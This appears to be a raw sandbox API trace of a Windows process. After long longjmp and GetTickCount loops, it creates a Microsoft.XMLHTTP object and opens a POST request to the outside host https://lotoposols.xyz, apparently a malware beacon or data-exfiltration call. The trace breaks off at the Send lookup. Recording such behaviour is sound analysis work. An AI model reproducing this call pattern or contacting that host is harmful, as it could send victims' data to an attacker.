	[0213.213] longjmp () 
	[0213.213] longjmp () 
	[0213.213] longjmp () 
	[0213.214] longjmp () 
	[0213.214] longjmp () 
	[0213.214] longjmp () 
	[0213.214] longjmp () 
	[0213.215] longjmp () 
	[0213.215] longjmp () 
	[0213.215] longjmp () 
	[0213.215] longjmp () 
	[0213.216] longjmp () 
	[0213.216] longjmp () 
	[0213.216] longjmp () 
	[0213.216] longjmp () 
	[0213.217] GetTickCount () returned 0x116a313
	[0213.217] longjmp () 
	[0213.217] longjmp () 
	[0213.218] longjmp () 
	[0213.218] longjmp () 
	[0213.218] longjmp () 
	[0213.218] longjmp () 
	[0213.219] longjmp () 
	[0213.219] longjmp () 
	[0213.219] longjmp () 
	[0213.219] longjmp () 
	[0213.220] longjmp () 
	[0213.220] longjmp () 
	[0213.220] longjmp () 
	[0213.220] longjmp () 
	[0213.221] longjmp () 
	[0213.221] longjmp () 
	[0213.221] longjmp () 
	[0213.222] longjmp () 
	[0213.222] longjmp () 
	[0213.222] longjmp () 
	[0213.223] longjmp () 
	[0213.223] longjmp () 
	[0213.223] longjmp () 
	[0213.223] longjmp () 
	[0213.224] longjmp () 
	[0213.224] longjmp () 
	[0213.224] longjmp () 
	[0213.224] longjmp () 
	[0213.225] longjmp () 
	[0213.225] longjmp () 
	[0213.225] longjmp () 
	[0213.226] longjmp () 
	[0213.226] GetTickCount () returned 0x116a323
	[0213.226] longjmp () 
	[0213.226] longjmp () 
	[0213.227] longjmp () 
	[0213.227] longjmp () 
	[0213.227] longjmp () 
	[0213.228] longjmp () 
	[0213.228] longjmp () 
	[0213.228] longjmp () 
	[0213.228] longjmp () 
	[0213.229] longjmp () 
	[0213.229] longjmp () 
	[0213.229] longjmp () 
	[0213.232] longjmp () 
	[0213.233] longjmp () 
	[0213.233] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x26d970 | out: lpclsid=0x26d970*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0213.233] SysStringLen (param_1=0x0) returned 0x0
	[0213.233] CoGetClassObject (in: rclsid=0x26d970*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef914e1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x26d940 | out: ppv=0x26d940*=0x7fef40bac20) returned 0x0
	[0213.233] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef40bac20, riid=0x7fef9156380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x26d948 | out: ppvObject=0x26d948*=0x0) returned 0x80004002
	[0213.233] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef40bac20, pUnkOuter=0x0, riid=0x7fef914ccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d930 | out: ppvObject=0x26d930*=0x47a5aa0) returned 0x0
	[0213.234] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef40bac20) returned 0x1
	[0213.234] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef91563b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x26d908 | out: ppvObject=0x26d908*=0x47a5c08) returned 0x0
	[0213.234] ??2@YAPEAX_K@Z () returned 0x3cacc0
	[0213.234] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x47a5c08, pUnkSite=0x3cacc0) returned 0x0
	[0213.234] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7feff44d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d678 | out: ppvObject=0x26d678*=0x0) returned 0x80004002
	[0213.234] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7feff426f70*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d680 | out: ppvObject=0x26d680*=0x0) returned 0x80004002
	[0213.234] XMLHTTPRequest:IUnknown:AddRef (This=0x3cacc0) returned 0x2
	[0213.234] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40c8070*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d860 | out: ppvObject=0x26d860*=0x3cacc0) returned 0x0
	[0213.234] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26c680 | out: ppvObject=0x26c680*=0x3cacc0) returned 0x0
	[0213.235] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d08d0*(Data1=0x75dd09cb, Data2=0x6c40, Data3=0x11d5, Data4=([0]=0x85, [1]=0x43, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xa0, [6]=0xfb, [7]=0xa3)), riid=0x7fef40b9ee8*(Data1=0xc, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c6b8 | out: ppvObject=0x26c6b8*=0x0) returned 0x80004002
	[0213.235] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0870*(Data1=0xfc4801a1, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), riid=0x7fef40d0870*(Data1=0xfc4801a1, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x26c6a8 | out: ppvObject=0x26c6a8*=0x0) returned 0x80004002
	[0213.235] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0890*(Data1=0xb722be00, Data2=0x4e68, Data3=0x101b, Data4=([0]=0xa2, [1]=0xbc, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x40, [6]=0x47, [7]=0x70)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26c678 | out: ppvObject=0x26c678*=0x0) returned 0x80004002
	[0213.235] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26c678 | out: ppvObject=0x26c678*=0x0) returned 0x80004002
	[0213.235] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x3
	[0213.235] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40cbbe0*(Data1=0x2933bf81, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppvObject=0x26c758 | out: ppvObject=0x26c758*=0x0) returned 0x80004002
	[0213.235] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08c0*(Data1=0x118, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c768 | out: ppvObject=0x26c768*=0x0) returned 0x80004002
	[0213.235] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26c750 | out: ppvObject=0x26c750*=0x3cacc0) returned 0x0
	[0213.235] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d08d0*(Data1=0x75dd09cb, Data2=0x6c40, Data3=0x11d5, Data4=([0]=0x85, [1]=0x43, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xa0, [6]=0xfb, [7]=0xa3)), riid=0x7fef40b9ee8*(Data1=0xc, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c780 | out: ppvObject=0x26c780*=0x0) returned 0x80004002
	[0213.235] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40cbbe0*(Data1=0x2933bf81, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppvObject=0x26c758 | out: ppvObject=0x26c758*=0x0) returned 0x80004002
	[0213.236] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0890*(Data1=0xb722be00, Data2=0x4e68, Data3=0x101b, Data4=([0]=0xa2, [1]=0xbc, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x40, [6]=0x47, [7]=0x70)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26c760 | out: ppvObject=0x26c760*=0x0) returned 0x80004002
	[0213.236] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26c760 | out: ppvObject=0x26c760*=0x0) returned 0x80004002
	[0213.236] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x3
	[0213.236] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x2
	[0213.236] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26d878 | out: ppvObject=0x26d878*=0x3cacc0) returned 0x0
	[0213.236] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), ppvObject=0x26d870 | out: ppvObject=0x26d870*=0x0) returned 0x80004002
	[0213.236] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x2
	[0213.236] XMLHTTPRequest:IUnknown:Release (This=0x47a5c08) returned 0x0
	[0213.236] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914ccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d918 | out: ppvObject=0x26d918*=0x47a5aa0) returned 0x0
	[0213.236] XMLHTTPRequest:IUnknown:AddRef (This=0x47a5aa0) returned 0x3
	[0213.236] XMLHTTPRequest:IUnknown:Release (This=0x47a5aa0) returned 0x2
	[0213.237] XMLHTTPRequest:IUnknown:Release (This=0x47a5aa0) returned 0x1
	[0213.237] XMLHTTPRequest:IUnknown:AddRef (This=0x47a5aa0) returned 0x2
	[0213.237] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26dbf0 | out: ppvObject=0x26dbf0*=0x0) returned 0x80004002
	[0213.237] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x47a5aa0, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x26dd90*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x26db44 | out: rgDispId=0x26db44*=1) returned 0x0
	[0213.241] XMLHTTPRequest:IUnknown:AddRef (This=0x47a5aa0) returned 0x2
	[0213.241] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26d8d0 | out: ppvObject=0x26d8d0*=0x0) returned 0x80004002
	[0213.242] XMLHTTPRequest:IDispatch:Invoke (in: This=0x47a5aa0, dispIdMember=1, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x1, pDispParams=0x26d8a8*(rgvarg=([0]=0x42be18*(varType=0xb, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x420000, varVal2=0x0), [1]=0x42be30*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42da90*(varType=0x8, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1="https://lotoposols.xyz", varVal2=0x0), varVal2=0x0), [2]=0x42be48*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42d958*(varType=0x8, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1="post", varVal2=0x0), varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x3, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x26d8f0, puArgErr=0x26d8c0 | out: pDispParams=0x26d8a8*(rgvarg=([0]=0x42be18*(varType=0xb, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x420000, varVal2=0x0), [1]=0x42be30*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42da90*(varType=0x8, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1="https://lotoposols.xyz", varVal2=0x0), varVal2=0x0), [2]=0x42be48*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42d958*(varType=0x8, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1="post", varVal2=0x0), varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x3, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x26d8f0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x26d8c0*=0x26dd90) returned 0x0
	[0213.242] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7feff44d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ce18 | out: ppvObject=0x26ce18*=0x0) returned 0x80004002
	[0213.242] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7feff426f70*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ce20 | out: ppvObject=0x26ce20*=0x0) returned 0x80004002
	[0213.242] XMLHTTPRequest:IUnknown:AddRef (This=0x3cacc0) returned 0x2
	[0213.242] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40c8070*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d000 | out: ppvObject=0x26d000*=0x3cacc0) returned 0x0
	[0213.243] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26be20 | out: ppvObject=0x26be20*=0x3cacc0) returned 0x0
	[0213.243] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d08d0*(Data1=0x75dd09cb, Data2=0x6c40, Data3=0x11d5, Data4=([0]=0x85, [1]=0x43, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xa0, [6]=0xfb, [7]=0xa3)), riid=0x7fef40b9ee8*(Data1=0xc, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26be58 | out: ppvObject=0x26be58*=0x0) returned 0x80004002
	[0213.243] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0870*(Data1=0xfc4801a1, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), riid=0x7fef40d0870*(Data1=0xfc4801a1, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x26be48 | out: ppvObject=0x26be48*=0x0) returned 0x80004002
	[0213.243] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0890*(Data1=0xb722be00, Data2=0x4e68, Data3=0x101b, Data4=([0]=0xa2, [1]=0xbc, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x40, [6]=0x47, [7]=0x70)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26be18 | out: ppvObject=0x26be18*=0x0) returned 0x80004002
	[0213.243] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26be18 | out: ppvObject=0x26be18*=0x0) returned 0x80004002
	[0213.243] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x3
	[0213.243] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40cbbe0*(Data1=0x2933bf81, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppvObject=0x26bef8 | out: ppvObject=0x26bef8*=0x0) returned 0x80004002
	[0213.243] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08c0*(Data1=0x118, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26bf08 | out: ppvObject=0x26bf08*=0x0) returned 0x80004002
	[0213.243] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26bef0 | out: ppvObject=0x26bef0*=0x3cacc0) returned 0x0
	[0213.244] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d08d0*(Data1=0x75dd09cb, Data2=0x6c40, Data3=0x11d5, Data4=([0]=0x85, [1]=0x43, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xa0, [6]=0xfb, [7]=0xa3)), riid=0x7fef40b9ee8*(Data1=0xc, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26bf20 | out: ppvObject=0x26bf20*=0x0) returned 0x80004002
	[0213.244] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40cbbe0*(Data1=0x2933bf81, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppvObject=0x26bef8 | out: ppvObject=0x26bef8*=0x0) returned 0x80004002
	[0213.244] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0890*(Data1=0xb722be00, Data2=0x4e68, Data3=0x101b, Data4=([0]=0xa2, [1]=0xbc, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x40, [6]=0x47, [7]=0x70)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26bf00 | out: ppvObject=0x26bf00*=0x0) returned 0x80004002
	[0213.244] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26bf00 | out: ppvObject=0x26bf00*=0x0) returned 0x80004002
	[0213.244] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x3
	[0213.244] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x2
	[0213.244] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26d018 | out: ppvObject=0x26d018*=0x3cacc0) returned 0x0
	[0213.244] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), ppvObject=0x26d010 | out: ppvObject=0x26d010*=0x0) returned 0x80004002
	[0213.244] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x2
	[0213.245] XMLHTTPRequest:IUnknown:Release (This=0x47a5aa0) returned 0x1
	[0213.245] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26dbf0 | out: ppvObject=0x26dbf0*=0x0) returned 0x80004002
	[0213.245] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x47a5aa0, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x26dd90*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x26db44 | out: rgDispId=0x26db44*=5) returned 0x0
	[0213.245] XMLHTTPRequest:IUnknown:AddRef (This=0x47a5aa0) returned 0x2
	[0213.245] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26d8d0 | out: ppvObject=0x26d8d0*=0x0) returned 0x80004002
